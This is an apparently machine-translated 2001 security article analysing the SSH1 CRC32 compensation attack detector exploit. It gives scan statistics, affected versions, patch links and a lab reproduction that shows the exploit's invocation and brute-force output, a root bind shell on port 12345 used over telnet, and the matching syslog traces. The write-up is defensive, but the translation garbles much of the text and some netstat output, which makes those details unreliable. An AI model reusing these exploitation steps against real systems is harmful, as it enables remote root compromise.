[Analysis] Analysis of SSH CRC32 Compensation Attack Detector Exploit

Analysis of SSH CRC32 Compensation Attack Detector Exploit

Creation time: 2001-11-12

Article attribute: finishing

Article submission:

Xundi (xundi_at_xfocus.org)

By xundi@xfocus.org

http://xfocus.org

2001/11/10

Due to the stream of SSH CRC32 Compensation Attack Detector Exploit code,

SSH scans are also more and more, this is a statistical report:

---------- ---------- -------- -------- - ----------

| DATE | #Probes | #Sources | #targets | #scanners |

---------- ---------- -------- -------- - ----------

| 2001-10-03 | 1466 | 45 | 987 | |

| 2001-10-04 | 319 | 25 | 212 | |

| 2001-10-05 | 825 | 22 | 783 | |

| 2001-10-06 | 86552 | 27 | 86305 |

| 2001-10-07 | 7564 | 29 | 7429 |

| 2001-10-08 | 2506 | 29 | 2449 | |

| 2001-10-09 | 1010 | 18 | 263 | |

| 2001-10-10 | 480 | 39 | 307 | |

| 2001-10-11 | 978 | 31 | 504 | |

| 2001-10-12 | 436 | 21 | 311 | |

| 2001-10-13 | 6731 | 27 | 6353 |

| 2001-10-14 | 1411 | 29 | 1084 | |

| 2001-10-15 | 936 | 34 | 723 | |

| 2001-10-16 | 1358 | 40 | 1256 | |

| 2001-10-17 | 1098 | 36 | 899 | |

| 2001-10-18 | 1779 | 31 | 1438 | |

| 2001-10-19 | 19722 | 28 | 19573 | 7 |

| 2001-10-20 | 25539 | 21 | 25419 | 3 |

| 2001-10-21 | 6796 | 26 | 6750 | 9 |

| 2001-10-22 | 807 | 30 | 482 | 5 || 2001-10-23 | 578 | 49 | 327 | 6 |

| 2001-10-24 | 2198 | 39 | 2025 | 9 |

| 2001-10-25 | 2368 | 31 | 1759 | 6 |

| 2001-10-26 | 712 | 37 | 591 | 7 |

| 2001-10-27 | 463 | 30 | 297 | 8 |

| 2001-10-28 | 495 | 30 | 263 | 5 |

| 2001-10-29 | 478 | 37 | 399 | 5 |

| 2001-10-30 | 1154 | 48 | 1051 | 5 |

| 2001-10-31 | 1998 | 46 | 1047 | 5 |

| 2001-11-01 | 66660 | 46 | 66386 | 5 |

| 2001-11-02 | 1514 | 40 | 926 | 5 |

| 2001-11-03 | 2142 | 36 | 2047 | 8 |

| 2001-11-04 | 1233 | 26 | 781 | 9 |

---------- ---------- -------- -------- - ----------

In view of this, compiling David A. Dittrich article (

http://staff.washington.edu/dittrich/misc/ssh-analysis.txt) For your reference and patch.

-------------------------------------------------- -----------------------------

Overview

==================

This vulnerability initially published them on BugTraq on SecurityFocus.com by Core-SDI organization.

Announcement Core-20010207, Date 2001, February 8:

http://www.securityfocus.com/advisories/3088

A brief description of the vulnerability is that there is an integer overflow problem in a piece of code belled in the SSH1 daemon. Problem

DeatTack.c, this program is developed by Core SDI to prevent the SSH1 protocol from being compensated by CRC32.

Since the error in the detect_attack () function is used as a 32-bit variable as a 32-bit variable in the detect_attack () function, it causes the table index overflow.

This will allow an attacker to cover content of any location in the memory, and an attacker may remotely get root permissions.

Other organizations have also announced some analysis and suggestions for this SSH vulnerability such as:

Http://xforce.iss.net/alerts/advise100.php

Http://razor.bindview.com/publish/advisories/adv_ssh1crc.htmlhttp://www.securityfocus.com/bugid=2347

And on October 21, 2001, Jay Dyson declares on incidents@securityfocus.com mailing list

Many information show SSH servers that scan the RIPE network segment:

Http://www.securityfocus.com/cgi-bin/archive.pl?id=75&start=2001-10-27&x=2001-11-02&mid=221998&threads=1

Then even in the Vuln-Dev@securityfocus.com mailing list is prompted in NewsBytes.com.

Some news descriptions are willing to pay $ 1,000 people to provide this attack tool. There is still a confirmed rumor

Solaris 8 / sparc ssh.com 1.2.26-31 The attack code of the system also exists. Famous security site

SecurityNewsportal.com is attacked by this vulnerability, the address below is black and shown:

http://defaced.alldas.de/mirror/2001/10/24/www.securitynewsportal.com/

Recently TESO released information about these attack code, you can view:

http://www.team-tesso.org/sshd_statement.php

Here is an affected SSH version:

SSH Communications Security SSH 2.x and 3.x (if SSH Version 1 Fallback is enabled)

SSH Communications Security SSH 1.2.23-1.2.31

F-Secure SSH Versions PRIOR TO 1.3.11-2

OpenSSH Versions PRIOR TO 2.3.0 (if SSH Version 1 Fallback is enabled)

OSSH 1.5.7

However, the supplier has provided patch information for the system, you can refer to the following address:

Http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm

http://openssh.org/security.html

Http://www.cisco.com/warp/public/707/ssh-multiple-pub.html

-------------------------------------------------- -------------------------

Analysis of attack behavior

=====================

October 6, 2001, an attacker uses CRC32 Compensation Attack from Netherlands network segment

The Detector Vulnerability Attack Program invaded a UW network using OpenSsh 2.1.1 redhat Linux

System, vulnerability description, such as CERT VU # 945216:

http://www.kb.cert.org/vuls/id/945216

A series of operating system commands in the system are replaced into a Trojan to provide future access and clear all

Log system. The second SSH server runs at a 39999 / TCP high port. After the system invades, it is used to scan other

Network other than UW to get more systems running OpenSSH 2.1.1.

This vulnerability program is analyzed by some recovery operations:

This attack code is based on the OpenSSH 2.2.0 (this is 2.1.1), which is picked by CRC32Compensation Attack Detection Function, but for OpenSSH.

2.1.1 Attack, the attack code can also be used in SSH.com 1.2.31 (for other SSH)

The tests of the agreement 1 and the version have not been completed).

Attack code is for the following system:

Linux / x86 ssh.com 1.2.26-1.2.31 RHL

Linux / x86 OpenSSH 1.2.3 (Maybe Others)

Linux / x86 OpenSSH 2.2.0p1 (Maybe Others)

FreeBSD 4.x, ssh.com 1.2.26-1.2.31 RHL

Although this attack code can attack multiple platform systems, the attacker only scans 22 / TCP ports.

Then connect these systems to get the response version of the program and only continue further for "OpenSSH_2.1.1".

These scans use fast SYN scans and use tools from T0RN Root Kit.

Analysis of the damaged system has found that 4,7067 addresses are scanned, and in these addresses, there are 1244

The host is identified that there is such a vulnerability, and the attacker successfully uses this vulnerability to enter the line on the line on August 8.

4 hosts.

This attacker code is limited to the use of access control (eg, "allowhosts" or "denyhosts" or "Denyhosts" in ssh.com.

Setting) or package filtering (eg, ipchains, iptables, ipf) systems do not work properly, because these

The public keys will be required to be exchanged.

-------------------------------------------------- -----------------------

Analysis of real-time on attacker code

============================

This attack code tests in isolation network segments, using network addresses 10.10.10.0/24, attack

The host uses 10.10.10.10 and a vulnerability service host is 10.10.10.3.

The service host system with vulnerabilities runs in Red Hat Linux6.0 (kernel 2.2.16-3 on AN i586)

The 1.2.31 version of SSH.com.

The attack host runs Fred Cohen's PLAC [1] (from the Linux 2.4.5 system booted by the CD-ROM),

The file is copied to the system using "NCAT) [2].

Attack one party

=========================

Use information when running attack code without any parameters:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Root @ plac / bin >> ./ssh

Linux / x86 sshd1 exploit by zip / teso (zip@james.kalifornia.com) - Ripped fromopenssh 2.2.0 SRC

Greets: Mray, Random, Big T, Sh1fty, Scut, DVORAK

PS. this sploit already OWNED CIA.GOV: /

** please pick a type **

Usage: ./ssh host [options]

Options:

-P port

-B base base address to start bruteforcing distance, by default 0x1800,

Goes ash as 0x10000

-t Type

-d Debug Mode

-o add this to delta_min

Types:

0: Linux / x86 ssh.com 1.2.26-1.2.31 RHL

1: Linux / x86 OpenSSH 1.2.3 (Maybe Others)

2: Linux / x86 OpenSSH 2.2.0p1 (Maybe Others)

3: FreeBSD 4.x, ssh.com 1.2.26-1.2.31 RHL

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

The test system runs the SSH.com version 1.2.31 (unpackored) program on the system port 2222, and

Retinate the Syslog log to a separate file Sshdx.log.

Here, the type TYPE 0 and 2222 attack ports are selected:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Root @ plac / bin >> ./ssh 10.10.10.3 -p 2222 -t 0

Linux / x86 sshd1 exploit by zip / teso (zip@james.kalifornia.com) - Ripped from

OpenSSH 2.2.0 SRC

Greets: Mray, Random, Big T, Sh1fty, Scut, DVORAK

PS. this sploit already OWNED CIA.GOV: /

.........................

Bruteforced distance: 0x3200

BruteForcing Distance from H-> Partial Packet Buffer on Stack

............ ^ [[[a ................ |!

Bruteforced H-> Ident Buff Distance: 5BFbed88

Trying Retloc_Delta: 35

....!

Found High Words of Possible Return Address: 808

Trying to exploit

....

Trying Retloc_Delta: 37

.!

Found High Words of Possible Return Address: 805Trying to EXPLOIT

....

Trying Retloc_Delta: 39

......

Trying Retloc_Delta: 3B

......

Trying Retloc_Delta: 3D

!

Found High Words of Possible Return Address: 804

Trying to exploit

....

Trying Retloc_Delta: 3F

......

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Here, the attack attack is similar to the "stop", and returns the attack system to see, but found that the latter is opened.

Reproduced by the test system

=====================================================================================================================================================

Before using the vulnerability, the test system shows the standard SSH daemon runs in 22 / TCP port,

The test-tested application runs at 2222 / TCP port, both are listening, and standard SSH guardianship

The program has an external connection (10.10.10.2:33354), viewed through NetStat as follows:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

[root @ Victim / root] # netstat -an --inet

Active Internet Connections (Servers and Established)

Proto Recv-q Send-Q Local Address Foreign Address State

TCP 0 0 10.10.10.3:0222 0.0.0.0:0:8 Listen

TCP 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

TCP 0 0 0.0.0.0:22 0.0.0.0:0:0:22 0.0.0.0:0:8 Listen

Raw 0 0.0.0.0:1 0.0.0.0:0:0:0.0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:00

Raw 0 0 0.0.0.0:00 0.0.0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:00

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

After the attack program "stop", use NetStat to see the network listening status as follows:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [root @ Victim / root] # netstat -an --inet

Active Internet Connections (Servers and Established)

Proto Recv-q Send-Q Local Address Foreign Address State

TCP 0 0 0.0.0.0:0345 0.0.0.0:0:8 Listen

TCP 0 0 10.10.10.3:2222 10.10.10.10:32965 ESTABLISHED

TCP 0 0 10.10.10.3:0222 0.0.0.0:0:8 Listen

TCP 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

TCP 0 0 0.0.0.0:22 0.0.0.0:0:0:22 0.0.0.0:0:8 Listen

Raw 0 0.0.0.0:1 0.0.0.0:0:0:0.0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:00

Raw 0 0 0.0.0.0:00 0.0.0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:00

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

It is found that there is a new service to listen in 12345 / TCP port.

Return to the attacker host, use NetStat to view the network status, discovery that the program uses violent guess address

Fashion attack:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

[root @ Victim / root] # netstat -an --inet

Active Internet Connections (Servers and Established)

Proto Recv-q Send-Q Local Address Foreign Address State

TCP 0 0 0.0.0.0:0345 0.0.0.0:0:8 Listen

TCP 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED

TCP 0 0 10.10.10.3:2222 10.10.10.10:33075 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33074 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33072 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33071 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33069 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33067 Time_Waittcp 0 0 10.10.10.3:2222 10.10.10.10:33066 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33064 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33063 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33062 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33061 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33060 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33059 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33058 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33056 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33055 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33053 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33051 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33050 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33048 TIME_WAIT

TCP 0 0 10.10.10.3:2222 10.10.10.10:33047 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33046 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33042 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33041 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33040 TIME_WAIT

TCP 0 0 10.10.10.3:2222 10.10.10.10:33039 TIME_WAIT

TCP 0 0 10.10.10.3:2222 10.10.10.10:33038 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33036 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33035 TIME_WAIT

TCP 0 0 10.10.10.3:2222 10.10.10.10:33034 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33033 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33032 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33030 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33029 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33028 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33027 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33024 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33023 Time_Wait

TCP 0 10.10.10.3:2222 10.10.10.10:33022 Time_Waittcp 0 0 10.10.10.3:2222 10.10.10.10:33021 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33020 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33016 Time_Wait

TCP 0 0 10.10.10.3:2222 10.10.10.10:33014 Time_Wait

TCP 0 0 10.10.10.3:0222 0.0.0.0:0:8 Listen

TCP 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

TCP 0 0 0.0.0.0:22 0.0.0.0:0:0:22 0.0.0.0:0:8 Listen

Raw 0 0.0.0.0:1 0.0.0.0:0:0:0.0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:00

Raw 0 0 0.0.0.0:00 0.0.0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:00

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Use the List Open Files ("LSOF") [4] tool to display a test SSH daemon to open a

New listening port:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

[root @ Victim / root] # lsof -p 9364

Command Pid User FD Type Device Size Node Name

SSHD 9364 Root CWD DIR 3, 3 1024 2 /

SSHD 9364 root RTD DIR 3, 3 1024 2 /

SSHD 9364 Root TXT REG 3, 3 655038 442413 /usR/local/src/ssh 1.2.31/sbin/sshd1

SSHD 9364 Root Mem REG 3, 3 340771 30722 /LIB/ld-2.1.3.so

SSHD 9364 Root Mem REG 3, 3 370141 31107 /LIB/LIBNSL-2.1.3.SO

SSHD 9364 Root Mem REG 3, 3 66231 31103 /Lib/LibCrypt-2.1.3.so

SSHD 9364 Root Mem REG 3, 3 47008 31113 /LIB/LIBUTIL-2.1.3.so

SSHD 9364 Root Mem REG 3, 3 4101836 31102 /Lib/Libc-2.1.3.so

SSHD 9364 Root Mem REG 3, 3 246652 31109 /LIB/LIBNSS_FILES-2.1.3.SO

SSHD 9364 Root Mem REG 3, 3 252234 31111 /LIB/LIBNSS_NISPLUS-2.1.3.so

SSHD 9364 Root Mem REG 3, 3 255963 31110 /LIB/LIBNSS_NIS-2.1.3.SO

SSHD 9364 ROOT MEM REG 3, 3 67580 31108 /LIB/LIBNSS_DNS-2.1.3.sosshd 9364 Root Mem REG 3, 3 169720 31112 /Lib/Libresolv-2.1.3.so

Sshd 9364 root 0u chr 1, 3 4110 / dev / null

SSHD 9364 ROOT 1U CHR 1, 3 4110 / dev / NULL

SSHD 9364 ROOT 2U CHR 1, 3 4110 / Dev / Null

Sshd 9364 root 3u inet 10202 TCP *: 12345 (Listen)

SSHD 9364 ROOT 4U INET 10197 TCP 10.10.10.3:2222->10.10.10.10:33190 (Close_Wait)

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Obviously, the attack program successfully utilized this vulnerability to get the root shell, and bind a high-end TCP port.

Such an attacker can connect to this port using any "telnet" or "RC" tool and superuser

The way any command is performed, as shown below:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Root @ plaac ~ >> Telnet 10.10.10.3 12345

Trying 10.10.10.3 ...

Connected to 10.10.10.3.

Escape Character is '^]'.

Id;

UID = 0 (root) GID = 0 (root) groups = 0 (root), 1 (bin), 2 (Daemon), 3 (Sys), 4 (ADM), 6 (Disk), 10 (WHEL)

Date;

THU NOV 1 18:04:42 PST 2001

Netstat -an

Active Internet Connections (Servers and Established)

Proto Recv-q Send-Q Local Address Foreign Address State

TCP 0 0 10.10.10.3:12345 10.10.10.10:33077 Establish

TCP 0 0 0.0.0.0:0345 0.0.0.0:0:8 Listen

TCP 1252 0 10.10.10.3:2222 10.10.10.10:33076 ESTABLISHED

TCP 0 0 10.10.10.3:0222 0.0.0.0:0:8 Listen

TCP 0 0 0.0.0.0:22 0.0.0.0:0:0:22 0.0.0.0:0:8 Listen

Raw 0 0.0.0.0:1 0.0.0.0:0:0:0.0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:00

Raw 0 0 0.0.0.0:00 0.0.0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:00

EXIT;

Connection Closed by Foreign Host.

Root @ plaac ~ >>

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = [Note]: Use Telnet to add ";", and NC connection is not required.

After an attacker exited, the system network status was returned to normal:

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

[root @ Victim / root] # netstat -an --inet

Active Internet Connections (Servers and Established)

Proto Recv-q Send-Q Local Address Foreign Address State

TCP 0 0 10.10.10.3:0222 0.0.0.0:0:8 Listen

TCP 0 0 10.10.10.3:22 10.10.10.2:33354 ESTABLISHED

TCP 0 0 0.0.0.0:22 0.0.0.0:0:0:22 0.0.0.0:0:8 Listen

Raw 0 0.0.0.0:1 0.0.0.0:0:0:0.0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:00

Raw 0 0 0.0.0.0:00 0.0.0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:0:0:0.0:0:0:0:0:0:0:0:00

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

If the Syslog log feature is turned on, the information on the connection and violent test will be recorded (note that this is

Tests for SSH.com 1.2.31 on Red Hat Linux 6.0 - Log Sign and Record OpenSSH

Different):

= - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =

Nov 1 18:46:14 Victim Sshd [9510]: log: connection from 10.10.10.10 Port 33298

Nov 1 18:46:19 Victim Sshd [9511]: log: connection from 10.10.10.10 port 33299

Nov 1 18:46:22 Victim Sshd [9512]: log: connection from 10.10.10.10 Port 33300

Nov 1 18:46:26 Victim Sshd [9513]: log: connection from 10.10.10.10 Port 33301

NOV 1 18:46:31 Victim Sshd [9515]: log: connection from 10.10.10.10 port 33302

Nov 1 18:46:35 Victim Sshd [9516]: log: connection from 10.10.10.10 Port 33303

Nov 1 18:46:39 Victim Sshd [9517]: log: connection from 10.10.10.10 port 33304

NOV 1 18:46:43 Victim Sshd [9518]: log: connection from 10.10.10.10 port 33305

Nov 1 18:46:47 Victim Sshd [9518]: Fatal: Local: Corrupted Check Bytes on Input.

Nov 1 18:46:47 Victim Sshd [9519]: log: connection from 10.10.10.10 Port 33306

Nov 1 18:46:52 Victim Sshd [9519]: Fatal: Connection Closed by Remote Host.

Nov 1 18:46:53 Victim Sshd [9520]: log: connection from 10.10.10.10 Port 33307

NOV 1 18:46:57 Victim Sshd [9521]: log: connection from 10.10.10.10 port 33308

Nov 1 18:47:01 Victim Sshd [9522]: log: connection from 10.10.10.10 Port 33309

Nov 1 18:47:06 Victim Sshd [9523]: log: connection from 10.10.10.10 Port 33310

NOV 1 18:47:10 Victim Sshd [9524]: log: connection from 10.10.10.10 port 33311

NOV 1 18:47:14 Victim Sshd [9525]: log: connection from 10.10.10.10 port 33312

NOV 1 18:47:19 Victim Sshd [9526]: log: connection from 10.10.10.10 port 33313

Nov 1 18:47:24 Victim sshd [9527]: log: connection from 10.10.10.10 port 33314

NOV 1 18:47:24 Victim Sshd [9527]: Fatal: Connection Closed by Remote Host.

Nov 1 18:47:46 Victim Sshd [9528]: log: connection from 10.10.10.10 port 33315

Nov 1 18:47:46 Victim Sshd [9529]: log: connection from 10.10.10.10 port 33316

Nov 1 18:47:47 Victim Sshd [9530]: log: connection from 10.10.10.10 Port 33317

Nov 1 18:47:47 Victim Sshd [9531]: log: connection from 10.10.10.10 Port 33318

Nov 1 18:47:47 Victim Sshd [9532]: log: connection from 10.10.10.10 port 33319

Nov 1 18:47:48 Victim Sshd [9533]: log: connection from 10.10.10.10 Port 33320

Nov 1 18:47:48 Victim Sshd [9534]: log: connection from 10.10.10.10 port 33321nov 1 18:47:48 Victim sshd [9535]: log: connection from 10.10.10.10 port 33322

Nov 1 18:47:49 Victim sshd [9536]: log: connection from 10.10.10.10 port 33323

Nov 1 18:47:49 Victim Sshd [9537]: log: connection from 10.10.10.10 Port 33324

NOV 1 18:47:50 Victim Sshd [9538]: log: connection from 10.10.10.10 port 33325

NOV 1 18:47:50 Victim Sshd [9539]: log: connection from 10.10.10.10 port 33326

NOV 1 18:47:50 Victim Sshd [9540]: log: connection from 10.10.10.10 port 33327

Nov 1 18:47:51 Victim Sshd [9541]: log: connection from 10.10.10.10 port 33328

Nov 1 18:47:51 Victim Sshd [9542]: log: connection from 10.10.10.10 port 33329

Nov 1 18:47:51 Victim Sshd [9543]: log: connection from 10.10.10.10 Port 33330

Nov 1 18:47:52 Victim Sshd [9544]: log: connection from 10.10.10.10 port 33331

NOV 1 18:47:52 Victim Sshd [9545]: log: connection from 10.10.10.10 port 33332

Nov 1 18:47:52 Victim Sshd [9546]: log: connection from 10.10.10.10 port 33333

Nov 1 18:47:53 Victim Sshd [9547]: log: connection from 10.10.10.10 Port 33334

Nov 1 18:47:53 Victim Sshd [9548]: log: connection from 10.10.10.10 port 33335

Nov 1 18:47:54 Victim Sshd [9549]: log: connection from 10.10.10.10 port 33336

NOV 1 18:47:54 Victim Sshd [9550]: log: connection from 10.10.10.10 port 33337

Nov 1 18:47:54 Victim Sshd [9551]: log: connection from 10.10.10.10 port 33338

NOV 1 18:47:55 Victim Sshd [9552]: log: connection from 10.10.10.10 port 33339

Nov 1 18:47:55 Victim Sshd [9553]: log: connection from 10.10.10.10 Port 33340

NOV 1 18:47:55 Victim Sshd [9554]: log: connection from 10.10.10.10 port 33341

NOV 1 18:47:56 Victim Sshd [9555]: log: connection from 10.10.10.10 port 33342

Nov 1 18:47:56 Victim Sshd [9556]: log: Connection from 10.10.10.10 Port 33343NOV 1 18:47:56 Victim Sshd [9555]: Fatal: Local: Corrupted Check Bytes on Input.

Nov 1 18:47:57 Victim Sshd [9557]: log: connection from 10.10.10.10 port 33344

Nov 1 18:47:57 Victim Sshd [9558]: log: connection from 10.10.10.10 port 33345

Nov 1 18:47:57 Victim Sshd [9559]: log: connection from 10.10.10.10 Port 33346

Nov 1 18:47:58 Victim SSHD [9560]: log: connection from 10.10.10.10 port 33347

Nov 1 18:47:58 Victim Sshd [9561]: log: connection from 10.10.10.10 Port 33348

NOV 1 18:47:59 Victim Sshd [9562]: log: connection from 10.10.10.10 port 33349

Nov 1 18:47:59 Victim Sshd [9563]: log: connection from 10.10.10.10 Port 33350

NOV 1 18:47:59 Victim Sshd [9564]: log: connection from 10.10.10.10 port 33351

NOV 1 18:48:00 Victim Sshd [9565]: log: connection from 10.10.10.10 port 33352

NOV 1 18:48:00 Victim Sshd [9566]: log: connection from 10.10.10.10 port 33353

NOV 1 18:48:00 Victim Sshd [9567]: log: connection from 10.10.10.10 port 33354

NOV 1 18:48:01 Victim Sshd [9568]: log: connection from 10.10.10.10 port 33355

NOV 1 18:48:01 Victim Sshd [9569]: log: connection from 10.10.10.10 port 33356

Nov 1 18:48:02 Victim Sshd [9570]: log: connection from 10.10.10.10 Port 33357

Nov 1 18:48:02 Victim Sshd [9571]: log: connection from 10.10.10.10 Port 33358

NOV 1 18:48:02 Victim Sshd [9572]: log: connection from 10.10.10.10 port 33359

NOV 1 18:48:03 Victim Sshd [9573]: log: connection from 10.10.10.10 port 33360

Nov 1 18:48:03 Victim Sshd [9574]: log: connection from 10.10.10.10 port 33361

Nov 1 18:48:03 Victim Sshd [9575]: log: connection from 10.10.10.10 Port 33362

Nov 1 18:48:04 Victim Sshd [9576]: log: connection from 10.10.10.10 port 33363

NOV 1 18:48:04 Victim Sshd [9577]: log: connection from 10.10.10.10 Port 33364NOV 1 18:48:04 Victim Sshd [9578]: log: connection from 10.10.10.10 port 33365

NOV 1 18:48:05 Victim Sshd [9579]: log: connection from 10.10.10.10 port 33366

Nov 1 18:48:05 Victim Sshd [9580]: log: connection from 10.10.10.10 Port 33367

NOV 1 18:48:06 Victim Sshd [9581]: log: connection from 10.10.10.10 port 33368

NOV 1 18:48:06 Victim Sshd [9582]: log: connection from 10.10.10.10 port 33369

NOV 1 18:48:06 Victim Sshd [9583]: log: connection from 10.10.10.10 port 33370

Nov 1 18:48:07 Victim Sshd [9584]: log: connection from 10.10.10.10 port 33371

Nov 1 18:48:07 Victim Sshd [9585]: log: connection from 10.10.10.10 Port 33372

Nov 1 18:48:07 Victim Sshd [9586]: log: connection from 10.10.10.10 port 33373

Nov 1 18:48:08 Victim Sshd [9587]: log: connection from 10.10.10.10 Port 33374

NOV 1 18:48:08 Victim Sshd [9586]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

Nov 1 18:48:08 Victim Sshd [9588]: log: connection from 10.10.10.10 Port 33375

NOV 1 18:48:08 Victim Sshd [9587]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

Nov 1 18:48:08 Victim Sshd [9589]: log: connection from 10.10.10.10 port 33376

Nov 1 18:48:08 Victim Sshd [9588]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

Nov 1 18:48:09 Victim Sshd [9590]: log: connection from 10.10.10.10 Port 33377

Nov 1 18:48:09 Victim Sshd [9589]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

NOV 1 18:48:09 Victim Sshd [9591]: log: connection from 10.10.10.10 port 33378

Nov 1 18:48:09 Victim Sshd [9590]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

Nov 1 18:48:09 Victim Sshd [9592]: log: connection from 10.10.10.10 Port 33379nov 1 18:48:09 Victim Sshd [9591]: Fatal: Local: CRC32 Compensation Attack: Network Attack detected

NOV 1 18:48:10 Victim Sshd [9592]: Fatal: Local: CRC32 Compensation Attack: Network Attack Detected

NOV 1 18:48:10 Victim Sshd [9593]: log: connection from 10.10.10.10 port 33380

Nov 1 18:48:10 Victim Sshd [9594]: log: connection from 10.10.10.10 Port 33381

NOV 1 18:48:10 Victim Sshd [9593]: Fatal: Local: Crc32 Compensation Attack: Network Attack Detected

